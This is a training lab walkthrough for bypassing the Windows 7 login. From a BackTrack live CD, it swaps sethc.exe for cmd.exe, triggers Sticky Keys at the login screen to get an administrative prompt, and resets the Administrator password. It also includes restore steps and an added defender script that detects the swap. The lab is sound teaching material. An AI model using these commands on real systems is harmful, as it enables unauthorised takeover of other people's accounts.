ComputerSecurityStudent (CSS)





(Password Clearing: Lesson 2)

{ Use BackTrack to Replace sethc.exe with cmd.exe }


Section 0. Background Information
  1. What is sethc.exe
    • sethc.exe is the program that provides some of the accessibility options (Sticky Keys) for users with disabilities at the login prompt.
    • The accessibility option is invoked by clicking in the Windows password box and pressing the Shift key 5 times.
    • From the Windows login screen, winlogon.exe launches sethc.exe, which provides the aforementioned accessibility options.
    • Consequently, sethc.exe can be compromised, because winlogon.exe does not verify what it is actually launching when the Shift key is pressed 5 times in the password text box.

  2. Lab Notes
    • In this lab we will do the following:
      1. Download the BackTrack5R1 ISO
      2. Boot the Windows 7 VM into the BackTrack5R1 environment
      3. Mount the Windows hard drive in the BackTrack environment
      4. Compromise sethc.exe by replacing it with a copy of cmd.exe
      5. Trigger the replaced binary by pressing Shift 5 times at the login screen
      6. Activate the Administrator account and reset its password

  3. Prerequisites
  4. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

 

Section 1. Download the BackTrack5R1 ISO
  1. Open A Firefox Browser
    • Notes
      • Login to the machine that has VM Player Installed.
    • Instructions
      1. Click on the Windows Start Button
      2. Type firefox in the search box
      3. Click on Mozilla Firefox

     

  2. Open A Firefox Browser

     

  3. Navigate and Save
    • Instructions
      1. Navigate to your external USB hard drive.
      2. Create a directory called BackTrack-ISO on your
      3. Click Save

 

Section 2. Start your Windows 7 VM
  1. Edit Virtual Machine Settings
    • Instructions
      1. Click on Windows 7
      2. Click on Edit virtual machine

     

  2. Configure CD/DVD (IDE)
    • Instructions
      1. Configure CD/DVD (IDE)
      2. Click the radio button "Use ISO image file:"
      3. Click the Browse button and navigate to the location of the BT5R1-GNOME-32.iso
      4. Click the Okay button

     

  3. Start Windows 7
    • Instructions
      1. Click on Windows 7
      2. Click on Play virtual machine

     

  4. Access the Boot Menu
    • Instructions
      1. Once you see the VMware screen shown below, (1) left-click in the screen and (2) press the <Esc> key.

     

  5. Boot from CD-ROM Drive
    • Instructions
      1. Arrow Down to where CD-ROM Drive is highlighted
      2. Press <Enter>

 

Section 3. Using the BackTrack Live CD
  1. Press any key to enter the menu
    • Instructions
      1. Press <Enter>

     

  2. Select BackTrack Text
    • Instructions
      1. Select BackTrack Text - Default Boot Text Mode.

     

  3. Mount the Windows Hard Drive
    • Instructions
      1. fdisk -l
      2. mount -t ntfs /dev/sda1 /mnt

     

  4. View Windows File System
    • Instructions
      1. df -k
    • Note(FYI):
      • Notice that the /dev/sda1 filesystem (i.e., the Windows disk partition) is now mounted on the /mnt directory.

     

  5. Navigate to the Windows/System32 Directory
    • Instructions
      1. cd /mnt
      2. ls
      3. cd Windows/System32/

     

  6. Replace sethc.exe with cmd.exe
    • Instructions
      1. cp sethc.exe sethc.exe.bkp
      2. cp cmd.exe sethc.exe
      3. cd /
      4. umount /mnt
      5. reboot
      6. Press <Enter>
    • Notes (FYI)
      • If you do not have an IP Address, do the following:
        1. /etc/init.d/network restart
          OR
        2. dhclient eth0
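
A defender's check for the swap performed in step 6 above, which also serves as the post-restore verification for Section 6; this is an added example and is not part of the original lab. It assumes the Windows partition is mounted as in step 3, that the optional known-good SHA-256 digest is one you recorded from a clean system, and that sha256sum and cmp are available on the live CD.

```shell
#!/bin/sh
# check_sethc.sh: offline integrity check for sethc.exe on a Windows volume
# mounted from the live CD as in Section 3 (e.g. /mnt/Windows/System32).
# Added example, not part of the original lab. Assumes POSIX sh, cmp and sha256sum.

# Print only the SHA-256 digest of a file.
sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

# check_sethc SYSTEM32_DIR [KNOWN_GOOD_SHA256]
# Prints findings and returns:
#   0  sethc.exe present and not the cmd.exe substitution
#   1  sethc.exe is byte-identical to cmd.exe (the swap performed in Section 3)
#   2  sethc.exe missing
#   3  sethc.exe differs from the supplied known-good digest
check_sethc() {
    sys32="$1"
    known="$2"
    sethc="$sys32/sethc.exe"
    cmd="$sys32/cmd.exe"
    [ -f "$sethc" ] || { echo "MISSING: $sethc"; return 2; }
    # A leftover sethc.exe.bkp is itself an indicator that a manual swap took place.
    if [ -f "$sys32/sethc.exe.bkp" ]; then
        echo "NOTE: backup artifact $sys32/sethc.exe.bkp present"
    fi
    if [ -f "$cmd" ] && cmp -s "$sethc" "$cmd"; then
        echo "ALERT: sethc.exe is byte-identical to cmd.exe"
        return 1
    fi
    if [ -n "$known" ] && [ "$(sha256_of "$sethc")" != "$known" ]; then
        echo "ALERT: sethc.exe SHA-256 does not match the known-good digest"
        return 3
    fi
    echo "OK: sethc.exe sha256=$(sha256_of "$sethc")"
    return 0
}

# Usage from the BackTrack shell after mounting: sh check_sethc.sh /mnt/Windows/System32
if [ "$#" -ge 1 ]; then
    check_sethc "$@"
fi
```

Run it before and after Section 6 to confirm the restore: the return code goes from 1 back to 0 once sethc.exe.bkp has been copied back over sethc.exe.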

     

Section 4. Implement the Accessibility Option
  1. Implement the Accessibility Option
    • Instructions
      1. In the password box, Press the Shift Key 5 Times

     

  2. Do you want to turn on Sticky Keys?
    • Instructions:
      1. Click No

     

  3. Administrative Command Prompt
    • Note(FYI):
      • Now you will see an administrative command prompt. 
    • Instructions:
      1. net user administrator * /active:yes
      2. shutdown -r -t 5 -c "Nice Trick"

     

  4. Login as Administrator
    • Instructions
      1. Click the Administrator account
    • Note(FYI)
      • Previously, only Security Student was the active account.

     

  5. Administrator Password
    • Instructions
      1. Provide the password created in (Section 4, Step 3).

 

Section 5. Proof of Lab
  1. Open A Command Prompt
    • Instructions
      1. Click on the Start Button
      2. Type "cmd" in the search box
      3. Click on cmd
     
  2. Proof of Lab Instructions
    • Instructions:
      1. net user administrator
      2. date
      3. Press <Enter>
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
      5. Press PrtScn (Print Screen) to capture the screen
      6. Paste into a Word document
      7. Upload to Moodle

 

Section 6. Post Lab Restore Work
  1. Access Virtual Machine Settings
    • Instructions:
      1. Virtual Machine --> Virtual Machine Settings...

     

  2. Configure CD/DVD (IDE)
    • Instructions
      1. Configure CD/DVD (IDE)
      2. Check the "Connect at power on" checkbox
      3. Click the radio button "Use ISO image file:"
      4. Click the Browse button and navigate to the location of the BT5R1-GNOME-32.iso
      5. Click the Okay button

     

  3. Restart Windows
    • Instructions
      1. Click Start Button
      2. Click Restart

     

  4. Access the Boot Menu
    • Instructions
      1. Once you see the VMware screen shown below, (1) left-click in the screen and (2) press the <Esc> key.

     

  5. Boot from CD-ROM Drive
    • Instructions
      1. Arrow Down to where CD-ROM Drive is highlighted
      2. Press <Enter>

     

  6. Press any key to enter the menu
    • Instructions
      1. Press <Enter>

     

  7. Select BackTrack Text
    • Instructions
      1. Select BackTrack Text - Default Boot Text Mode.

     

  8. Mount the Windows Hard Drive
    • Instructions
      1. fdisk -l
      2. mount -t ntfs /dev/sda1 /mnt

     

  9. View Windows File System
    • Instructions
      1. df -k
    • Note(FYI):
      • Notice that the /dev/sda1 filesystem (i.e., the Windows disk partition) is now mounted on the /mnt directory.

     

  10. Navigate to the Windows/System32 Directory
    • Instructions
      1. cd /mnt
      2. ls
      3. cd Windows/System32/

     

  11. Restore sethc.exe
    • Instructions
      1. cp sethc.exe.bkp sethc.exe
      2. cd /
      3. umount /mnt
      4. poweroff
      5. Press <Enter>

 


